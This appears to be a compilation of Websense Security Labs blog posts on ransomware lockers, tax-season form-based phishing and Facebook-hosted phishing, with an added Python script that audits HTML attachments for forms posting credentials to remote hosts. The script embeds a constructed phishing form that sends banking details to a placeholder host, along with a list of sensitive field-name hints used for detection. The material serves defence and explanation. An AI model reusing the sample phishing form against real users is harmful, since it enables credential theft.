The second type, boot lockers, replaces the MBR on the disk with an infected one, blocking the boot sequence of the computer completely – e.g. Trojan.Bootlock. The message tells the victim how to “decrypt” the disk by sending a text to a premium-rate number (Picture 5). The criminals claim the whole disk has been encrypted and that the only way to get the data back is to pay via uKash or paysafecard on www.safe-data.ru (Picture 6). Again, fortunately for the victims, there is no encryption of the hard drive, only a simple MBR replacement. Also, this particular malware has been using the same passwords continuously – aaaaaaciip and aaaaadabia.

 

Picture 5 : Ransomware replaces the MBR with an infected one blocking the PC boot sequence completely

 

 

Picture 6 : The criminals ask for a payment via online payment services

 

 

Application lockers

The last category is probably the least widespread and least dangerous one. The malware blocks access to specific applications or Web sites, asking either for a ransom or, more often, for the victim to fill out a survey that subscribes them to premium-rate mobile services – e.g. the Yimfoca IM worm. If the victim declines to fill in the survey, access to the page remains blocked. Even restarting the machine does not help. However, other browsers can access the site with no problems.

 

Malware delivery

The delivery of malicious files is done via the usual malware channels – fake codecs or video players, embedded in illegal copies of programs, via spam, IM chats, comments on personal pages, or USB drives containing “special bonuses”. There is nothing new about the ways in which criminals try to compromise victims. Having said this, protection against such attacks is possible, and Websense customers are protected with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

 

Is ransomware a successor of scareware?

We dare to say it is not. Both malware groups try to convince the victim that there is no way to avoid paying money, although the approach is very different. With scareware the victims at least have a chance to resist the social engineering offering the only solution and work on the cleaning process on their own. With ransomware this chance hardly exists at all. Yes, there are many similarities and it is likely the same people stand behind both types of malware groups. However, in one case there is a "seller" offering the "products and services"; in the other one an extorter asking for ransom. Even though both are illegal and dishonest, the approach is different.

 

Restoration and Protection

Restoration of data or access depends on the kind of malware. In some cases it is possible to download a utility and clean the infected system; in other cases, to replace malicious parts with clean ones. Unfortunately, there is no means to bypass malware such as Gpcode. Therefore the only protection is to keep up-to-date backups stored off the machine at all times. With storage as cheap as it is, this should not be an issue at all. And, of course, services from Websense protect potential victims even against such obstacles as restoring data from backups.

 

To see how Websense protects our customers from Ransomware you can watch the following YouTube video:

 


Ivan Sabo

Tax does not have to be tasking, says Moira!
Posted: 24 Jan 2011 07:02 AM

 

As the UK self assessment tax return deadline for online completion draws near, and the US tax season begins, we at Websense Security Labs again see an increase in related spam.

 

The most recent attacks are mainly "form-based." Our Threatseeker network finds these coming in several varieties, but the main one is a request for the recipient to complete an attached HTML form or zipped file containing an HTML form. Given that it is tax season, this phishing attack often takes the form of welcome news: it purports to be an email notification from the tax office indicating a refund. As usual, spammers are keeping abreast of the important events of the season, and know that January is when the public usually submits returns and starts getting refunds. The form-based approach is a slight variation: the spammers don’t seem to be restricting themselves to the usual direct links to phishing sites to lure unsuspecting recipients into divulging personal details.

 

Websense customers are proactively protected against this attack via both email and Web channels by our Advanced Classification Engine (ACE).

 

What are form-based email attacks?


Form-based attacks are a type of phishing.  Instead of using a link to take the recipient to a phishing site, they include a form that the user is asked to complete.  When the user completes and submits the form, the details are sent to the attacker.  The short video below shows an example of a form-based attack.
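Since the form travels inside the attachment, the form's own action attribute and input fields are the evidence a mail gateway or analyst can inspect without following any link. The script below is an added example for that check and is not code from the post or from Websense; it relies only on Python's standard html.parser, and the two HTML samples (including the refund-collect.example.invalid host) are constructed, with no real brand content.

```python
"""Audit the <form> elements in an HTML attachment: where do they submit,
and do they collect credential or payment data?"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Field-name fragments that suggest credential or payment data is being collected.
SENSITIVE_HINTS = ("pass", "pin", "card", "cvv", "account", "sort", "ssn", "routing", "dob")


class FormAudit(HTMLParser):
    """Collects every <form> with its action, method and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""),
                             "method": a.get("method", "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append(
                (a.get("type", "text").lower(), a.get("name", "").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_attachment(html_text):
    """One finding per form that submits to a remote host or asks for sensitive data."""
    parser = FormAudit()
    parser.feed(html_text)
    findings = []
    for form in parser.forms:
        host = urlsplit(form["action"]).hostname or ""
        sensitive = [name for ftype, name in form["fields"]
                     if ftype == "password" or any(h in name for h in SENSITIVE_HINTS)]
        reasons = []
        if host:
            reasons.append(f"submits to remote host {host}")
        if sensitive:
            reasons.append("collects " + ", ".join(sensitive))
        if reasons:
            findings.append({"action": form["action"], "host": host,
                             "sensitive": sensitive, "reasons": reasons})
    return findings


# Constructed attachment in the style described above; placeholder host only.
PHISHING_SAMPLE = """<html><body>
<h1>Tax refund request</h1>
<form action="http://refund-collect.example.invalid/submit.php" method="post">
  Full name <input type="text" name="full_name">
  Account number <input type="text" name="account_number">
  Sort code <input type="text" name="sort_code">
  Card number <input type="text" name="card_number">
  Online banking password <input type="password" name="online_password">
  <input type="submit" value="Submit refund request">
</form></body></html>"""

# Constructed benign form: relative action, nothing sensitive.
BENIGN_SAMPLE = '<form action="/search"><input type="text" name="q"></form>'

if __name__ == "__main__":
    for finding in audit_attachment(PHISHING_SAMPLE):
        print(finding["action"], "->", "; ".join(finding["reasons"]))
    print("benign findings:", audit_attachment(BENIGN_SAMPLE))
```

A remote action host is the strongest single signal, because a legitimate form shipped as an attachment has nowhere sensible to post to; the field-name heuristic catches the case where the action is hidden behind a relative path or filled in later by script.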

 

 

As shown below, several of the attacks are very convincing. We can see how a user might fall prey to such a scam. The first of the samples is aimed at users in the United Kingdom, and includes a picture of Moira Stuart, who plays the narrator in the HMRC television advert. The second sample is aimed at users in the United States, as the content suggests (IRS).

 

Other form-based samples that we see in the wild include campaigns that target:

- Lloyds TSB Bank

- HSBC Bank

- Santander Bank

- Alliance & Leicester Bank

- Paypal


Anonymous

Facebook used for phishing attacks and open redirects
Posted: 29 Nov 2010 06:02 AM

Recently, at Websense Security Labs, we have seen Facebook being used to display phishing pages for different services, as well as to redirect to phishing pages hosted elsewhere. Below are two examples of what the phishing attempts look like:

 

 

The first email message appears to come from Facebook Security, and requests that users confirm their account. This is just like other phishing attacks we see every day. The twist here is that the phishing page itself gets loaded from within the Facebook site using an iframe. This makes it look much more legitimate than a site hosted on another domain.

 

 

The second message is similar, but there's another URL towards the end. Clicking the link sends the user to www.facebook.com, where a script redirects the user to another Web site that contains the phishing page.

 

Both of these attacks make it harder for the user to spot the malicious content directly from the email, since both messages point to a valid Facebook URL. In addition, the inclusion of valid Facebook URLs makes protecting users somewhat harder for anti-spam solutions and Web filtering products that rely heavily on URL filtering to classify content.

 

Below is a video of both attacks in action. The video also shows a variant that looks like a Zynga account notification, also hosted in part by Facebook. Our customers have been protected against this threat by ACE, our Advanced Classification Engine.

 

Patrik Runald


©2013 Websense, Inc. All Rights Reserved.